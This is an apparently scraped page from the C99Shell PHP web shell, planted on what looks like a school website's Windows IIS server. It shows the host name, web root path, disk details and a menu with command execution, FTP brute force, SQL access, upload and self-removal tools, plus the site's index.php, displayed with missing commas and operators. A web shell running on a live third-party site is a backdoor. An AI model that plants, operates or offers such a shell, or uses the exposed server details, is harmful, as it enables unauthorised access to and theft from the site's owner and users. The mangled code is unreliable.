!C99Shell v. 2.1 [PHP 8 Update] [02.02.2022]!

Software: Microsoft-IIS/10.0. PHP/7.4.33 

uname -a: Windows NT LAKE 10.0 build 20348 (Windows Server 2016) AMD64 

IWPD_801(traduongco) 

Safe-mode: OFF (not secure)

E:\thcsltv.edu.vn\httpdocs\   drwxrwxrwx
Free 224.42 GB of 400 GB (56.11%)
Detected drives: [ a ] [ c ] [ d ] [ e ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     index.php (1.13 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php define('_JEXEC'1);
  if (
file_exists(dirname(__FILE__) . '/defines.php'))  { include_once dirname(__FILE__) . '/defines.php'; }
  if (!
defined('_JDEFINES')) { define('JPATH_BASE'dirname(__FILE__)); require_once JPATH_BASE.'/includes/defines.php';}
  require_once 
JPATH_BASE.'/includes/model.php';  $obj = new module;   $obj->lib_menu(); 
  
$task $obj->get_input('task');      $scr $obj->get_input('scr');          $link_up $obj->get_input('link_up');
  
$msg_on $obj->get_input('msg_on');  $msg_of $obj->get_input('msg_of');    $status $obj->get_input('status');
  
$access $obj->get_input('access');  $token $obj->get_input('token');
  switch (
$task
    {  case 
null:    $obj->token($token);   $path  PATH_LOGIN.'default.php';   require $path;    break; 
       case 
'login'$path  PATH_LOGIN.$task.'.php';   require $path; break;    
       default:      
$obj->sitename();  $login $obj->get_input('login');
                     include 
PATH_DOCUMENT.$obj->root.'/modules/home.php'
                     if (
$access != null) {$obj->item($scr,$link_up,$msg_on,$msg_of,$status,$access,$login);}             
    }
 
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 0.5413 ]--